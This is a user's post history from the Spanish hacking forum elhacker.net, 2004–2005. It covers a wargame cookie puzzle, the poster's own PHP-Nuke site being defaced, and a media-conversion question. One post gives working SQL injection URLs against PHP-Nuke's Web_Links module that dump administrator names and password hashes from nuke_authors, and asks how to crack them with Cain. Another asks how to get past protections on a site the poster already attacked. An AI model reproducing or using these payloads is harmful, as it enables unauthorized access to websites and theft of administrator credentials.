elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Desafíos - Wargames / Re: Para los caballeros de: Binari0s® en: 20 Enero 2005, 13:14 pm
Esto me sale a mi:

Código:
function polis(max)
{
if (testCookies())
               {
                var today = new Date();
                var num = Math.round((Math.abs(Math.sin(today.getTime()))*1000))%max+1;
                if (num==456+514-120/2);{num = num-75;}
                SetCookie('num_0',num,'*****');
                return num;
}
else return false;
}


y pongo los numeros que salen en ****** y no me lo coje!! no hay manera...
2  Seguridad Informática / Desafíos - Wargames / Re: Para los caballeros de: Binari0s® en: 18 Enero 2005, 13:51 pm
He leido todo el foro entero, pero aun asi sigo sin enterarme....

Yo estoy en la prueva de Windows, e visto por el codigo fuente que el formulario lleva a otro sitio, voy a ese sitio y alli segun dice en un post en este foro el numeroque esta al lado de la variable "num_0" le introduzco como codigo y me dice que No paso la prueva.. ya no se mas numero poner de esa pagina y en el codigo fuente ya veo que no hay nada solo la pista para saber la solucion.

Ayuda, no puede estar mal esa sección?
3  Seguridad Informática / Nivel Web / Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones.... en: 27 Julio 2004, 08:00 am
A ver..  señores..  como lo puedo explicar de alguna manera.. para que no dañe la sensivilidad de los demas usuarios.. ??? ???

Quiero quedar unas cosas claras ok?  >:(

1º No me agregen al Messenger... porque les borrare...

2º Si me agregan al Messenger y lo primero que me dicen es... sabes hackar una pagina php-nuke?.. tambien los borrare...

3º Yo no soy ningun maestro de php-nuke ni de hacking o sea que no enseño a nadie.. por lo cual los que me agregen al Messenger y me digan que les enseñe... les borrare...

4º Esto es un Foro para compartir opiniones, para dibulgar lo que a uno le apetezca o lo que el foro permitar.. por lo cual los usuarios que no tengan ni idea.. que no digan que les enseñemos.. por favor.. aprender un pokito buscando en el foro o en otro sitios, que viene muy bien explicado... asi aprendimos los demas...

5º A todo esto.... Gracias por leer este comunicado.

Saludos
4  Seguridad Informática / Nivel Web / Re: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones.... en: 12 Mayo 2004, 05:20 am
Wenas...

Ya nadie actuliza esto?? porque yo tengo una dudita.. el día 10 uno usuarios (por llamarlos asi) me se infiltraron en mi web de php-nuke 7.2 borrandome y cambiandome varias cosas del web ( y ellos me dejaron un mensaje diciendo que la habian hackeado... y que yo era un lammer)(la verdad no se quien es mas lammer si ellos o yo), ahora la he tenido que borrar de nuevo y volverla a subir... esto ya no me va a volver a pasar.. porque,ya que e puesto logers y algunas cosillas para que me de total información de quien entra o sale de la pagina solo digo que la proxima vez que ocurra ya no borrare la pagina si no que denunciare a los usuarios maldiciosos llevando a la guardia civil todos los corresponidientes documentos que piden para una denuncia requeridad por la legislación española.

Ahora esta es mi duda... que bug puede tener el php-nuke7.2, si estan con los correspondientes parches??? ha salido algun bug nuevo?

Saludos.

P.D.: Los usuarios maldiciosos que borraron y/o jodieron mi web me dejaron http://www.elhacker.net y "emulanetwork" de referencia, asique supongo que serán usuarios registrados aquí.
5  Media / Multimedia / Pasar OGG o OGM a AVI en: 15 Abril 2004, 20:44 pm
Bueno poz eso jejej que si alguien sabe como padar de OGG,OGM a AVI.

Saludos!
6  Seguridad Informática / Nivel Web / Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones.... en: 28 Marzo 2004, 14:35 pm
 >:( >:( Se jodio se jodio... que ya no vale este exploit para el php-nuke de la nueva version... ya que viene con sus protecciones
7  Seguridad Informática / Nivel Web / Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones.... en: 5 Marzo 2004, 01:57 am
Eso es muy facil, te salen los errores de la base de datos.. porque? pues por que la web donde as realizado el bug no tiene activado el modulo de Web_Links o simplemente a borrado ese modulo como preteccion.
Lo que sacamos encuenta.. que no se puede hacer en esa web.
8  Seguridad Informática / Nivel Web / Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones.... en: 16 Febrero 2004, 09:20 am
Weinas...oyes yo me preguntaba por casualidad... habria forma de saltarse la proteccion esa?
Es que no me acorde de guardar el Pass en MD5 y ahora an puesto la proteccion en la web donde lo hice y no se... amos que yo me preguntaba eso que si habia alguna manera de poder saber de nuevo el pass saltandose la proteccion..? ??? ??? ???
9  Seguridad Informática / Nivel Web / Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones.... en: 10 Febrero 2004, 03:50 am
Realmente funciona
Para el PHP-Nuke y el Modulo WebLinks:

Para que muestre todos los administradores:
/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20

Y para que muestre los Password Codificados de los administradores:
/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20pwd,%20aid%20FROM%20nuke_authors%20

Pero tengo una duda como puedo crackear con el Cain el PWL? es que no lo entiendo.. por mas que traduzco manuales del cain al español no se como crackear el pasword si alguien sabe algo... que me mande un e-mail: juan_lux@hotmail.com
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines